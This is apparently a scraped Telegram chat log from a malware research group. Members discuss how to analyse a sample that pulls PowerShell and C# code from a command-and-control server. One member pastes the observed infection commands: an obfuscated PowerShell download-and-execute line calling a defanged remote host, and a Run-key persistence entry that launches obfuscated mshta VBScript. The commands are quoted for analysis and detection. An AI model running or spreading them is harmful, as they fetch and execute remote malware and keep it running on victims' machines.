9687
Group for Malware Analysts. Pinned message with resources and rules: https://t.me/MalwareResearch/38033
otherwise, the lazy/confidential way would be to go to Malpedia and search for the malware name and read through the reports for its behaviours for detection
Читать полностью…
If anyone is curious about this or tries to solve it, pls let me know as well.))
Читать полностью…
I was able to analyze the part where it downloads and compiles C# code, but I couldn't manage the part after that
Читать полностью…
"I was able to analyze the part where it downloads and compiles C# code, but I couldn't manage the part after that."
Читать полностью…
Can’t get things which is c# want download from c2
Читать полностью…
But that's just the beginning. After understanding it, what is it that you want to do with the information is the next question...
You can research into a lot of things, but that path should lead to something that you want?
Give this a shot, also try to just straight up 7z the pe.
Читать полностью…
Hi Researcher , can unpack malware whose use exe4j to pack itself?
Читать полностью…
Hello TK, welcome to the Malware Research group! Please read the pinned message before you post!
Читать полностью…
the URL is dead, no samples are available. if you need help in analysis, please share the hash so someone else can download and assist you
Читать полностью…
The detection part is completed. What I want to figure out is the malware's behavior. If the C# code is running, or if it has already run, what does it do? What are the next steps?
Читать полностью…
Based on the pasted script...
A PowerShell script that connects to the Internet, which subsequently executes cmd and modifies the Run key?
Sigma rule can do that, but whether your tool can support this method of detection is another
Sam:
All starts with this commands
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (&NeW-oBjeCt NEt.webClIeNT).doWnLoaDstRInG('[httP://]sToRKa.sTORe/Ps/06fCC253-fD2C-5a52-6f46-a0B42e64251c')|CMd
Command line: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "_06fcc253fd2c5a526f46a0b42e64251c" /t REG_SZ /F /D "mShta VbscRiPt:closE(execUTe(\"cr\"+\"eAt\"+\"eO\"+\"Bj\"+\"ect\"+\"(\"\"\"+\"WS\"+\"CRI\"+\"pt\"+\".Sh\"+\"ELl\"+\"\"\").\"+\"Run\"+\" \"\"\"+\"%_\"+\"06\"+\"FC\"+\"C25\"+\"3F\"+\"D2\"+\"C5\"+\"a5\"+\"26\"+\"F4\"+\"6a\"+\"0B4\"+\"2e\"+\"642\"+\"51c\"+\"%\"\",\"+\"0\"))"
I still don't get where the question is leading to
So you want a sample? Or know what kind of malware exhibits this behaviour? Or if you can detect such behaviour?
All starts with one script , it’s connect to c2 server gets powershell scripts then runing it, then downloads another c# code , doing compail then c# code starts downloading another tool, I need research this malware
Читать полностью…
I think if you input that into Google, you are going to get tons of definitions and common execution methods
Читать полностью…
No... I don't understand, and Google isn't helping
Читать полностью…
Hello @nguyen_duyhung, welcome to the Malware Research group! Please read the pinned message before you post!
Читать полностью…
New FedBan
Fed: Libra's Empire
FedAdmin: ❤🦦
User: Александр
User ID: 1351806164
Reason: scam